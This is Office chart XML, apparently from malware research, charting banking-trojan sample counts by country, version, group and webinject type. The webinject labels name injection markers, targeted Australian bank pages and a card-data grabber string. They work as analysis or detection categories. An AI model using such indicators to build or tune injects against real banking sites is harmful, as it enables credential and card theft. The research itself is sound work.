          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="-2084153640"/>
        <c:axId val="-2084162888"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="-2084153640"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1001" b="1">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="-2084162888"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="-2084162888"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="819">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="-2084153640"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln w="23108">
          <a:noFill/>
        </a:ln>
      </c:spPr>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr sz="1001">
              <a:solidFill>
                <a:srgbClr val="65656A"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:defRPr>
          </a:pPr>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr sz="1638" b="0" i="0" u="none" strike="noStrike" baseline="0">
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman"/>
          <a:ea typeface="Times New Roman"/>
          <a:cs typeface="Times New Roman"/>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Sheet1!$A$1:$A$30</c:f>
              <c:strCache>
                <c:ptCount val="30"/>
                <c:pt idx="0">
                  <c:v>us </c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>it </c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>au </c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>ca </c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>uk </c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>de </c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>lu </c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>hk </c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>jp </c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>br </c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>c2 </c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>ru </c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>nl </c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>fi </c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>at </c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>se </c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>ch </c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>gi </c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>pl </c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>es </c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>co </c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>cy </c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>cn </c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>dk </c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>eu </c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>ar </c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>fr </c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>cl </c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>ec </c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>im </c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$1:$B$30</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="30"/>
                <c:pt idx="0">
                  <c:v>1808</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1455</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>1349</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>1246</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1166</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>302</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>172</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>131</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>85</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>47</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>33</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>32</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>31</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>28</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>26</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>24</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>20</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>20</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-5C28-A24A-BFD1-61FFD90AF246}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="855432688"/>
        <c:axId val="855434368"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="855432688"/>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Countries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855434368"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="85543436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Samples (log)</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855432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855432688"/>
        <c:axId val="855434368"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="855432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Countries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5434368"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="85543436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Samples (log)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5432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Sheet1!$A$1:$A$27</c:f>
              <c:strCache>
                <c:ptCount val="27"/>
                <c:pt idx="0">
                  <c:v>tables </c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>wer.com.au page injected </c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>.::grab </c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>adm= </c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>e.php?v= </c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>boq.com.au page injected </c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>decode64 </c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>r= </c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>id= </c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>data-s %SOCKS% </c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>.::CC+VBV Grabber </c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>page injected </c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>_txt.insert </c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>_b=%BOTUID% </c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>scp= </c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>cfre= </c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>ba_host </c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>home </c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>fAkE_link </c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>fAkElink </c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>idBot </c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>b=%BOTID% </c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>fAkEelem </c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>myjs1 </c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>scriptElement.src </c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>lnk= </c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>script_link </c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$1:$B$27</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="27"/>
                <c:pt idx="0">
                  <c:v>1366</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1091</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>298</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>283</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>215</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>195</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>171</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>115</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>112</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>106</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>100</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>65</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>63</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>33</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>26</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>21</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>20</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>20</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-95D4-4C4A-894B-FFC0CF7F4F54}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="927345168"/>
        <c:axId val="923106368"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="927345168"/>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Webinject Types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923106368"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="92310636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Samples (log)</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927345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855432688"/>
        <c:axId val="855434368"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="855432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Countries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5434368"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="85543436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Samples (log)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5432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Sheet1!$A$1:$A$50</c:f>
              <c:strCache>
                <c:ptCount val="50"/>
                <c:pt idx="0">
                  <c:v>group_0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>group_1</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>group_2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>group_3</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>group_4</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>group_5</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>group_6</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>group_7</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>group_8</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>group_9</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>group_10</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>group_11</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>group_12</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>group_13</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>group_14</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>group_15</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>group_16</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>group_17</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>group_18</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>group_19</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>group_20</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>group_21</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>group_22</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>group_23</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>group_24</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>group_25</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>group_26</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>group_27</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>group_28</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>group_29</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>group_30</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>group_31</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>group_32</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>group_33</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>group_34</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>group_35</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>group_36</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>group_37</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>group_38</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>group_39</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>group_40</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>group_41</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>group_42</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>group_43</c:v>
                </c:pt>
                <c:pt idx="44">
                  <c:v>group_44</c:v>
                </c:pt>
                <c:pt idx="45">
                  <c:v>group_45</c:v>
                </c:pt>
                <c:pt idx="46">
                  <c:v>group_46</c:v>
                </c:pt>
                <c:pt idx="47">
                  <c:v>group_47</c:v>
                </c:pt>
                <c:pt idx="48">
                  <c:v>group_48</c:v>
                </c:pt>
                <c:pt idx="49">
                  <c:v>group_49</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$1:$B$50</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="50"/>
                <c:pt idx="0">
                  <c:v>1541</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>681</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>242</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>166</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>141</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>139</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>134</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>129</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>119</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>92</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>89</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>69</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>67</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>64</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>56</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>55</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>48</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>46</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>45</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>44</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>36</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>36</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>34</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>32</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>31</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>24</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>23</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>21</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>17</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>16</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>16</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="44">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="45">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="46">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="47">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="48">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="49">
                  <c:v>5</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-654A-E348-BE05-A3C49B855251}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="541440079"/>
        <c:axId val="541441759"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="541440079"/>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Group</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41441759"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="541441759"/>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Samples (log)</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41440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Samples</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$46</c:f>
              <c:strCache>
                <c:ptCount val="45"/>
                <c:pt idx="0">
                  <c:v>2.1.0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2.1.1</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2.1.2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2.1.3</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>2.2.1</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>2.2.2</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>2.2.3</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>2.2.4</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>2.2.5</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>2.2.6</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>2.2.7</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>2.2.8</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>2.2.9</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>2.2.10</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>2.2.11</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>2.2.12</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>2.2.13</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>2.2.14</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>2.3.1</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2.3.2</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>2.3.3</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2.3.4</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>2.4.1</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>2.4.2</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>2.4.3</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>2.4.4</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>2.5.0</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>2.5.1</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>2.5.2</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>2.5.3</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>2.5.4</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>2.5.5</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>2.5.6</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>2.5.7</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>2.6.0</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>2.6.1</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>2.6.2</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>2.6.3</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>2.6.4</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>2.6.5</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>2.6.6</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>2.6.7</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>2.6.8</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>2.6.9</c:v>
                </c:pt>
                <c:pt idx="44">
                  <c:v>2.6.10</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$46</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="45"/>
                <c:pt idx="0">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>21</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>21</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>32</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>17</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>107</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>34</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>625</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>1016</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>126</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>209</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>39</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>72</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>71</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>177</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>44</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>111</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>79</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>84</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>68</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>24</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>56</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>18</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>44</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>37</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>720</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>140</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>53</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>28</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>56</c:v>
                </c:pt>
                <c:pt idx="41">
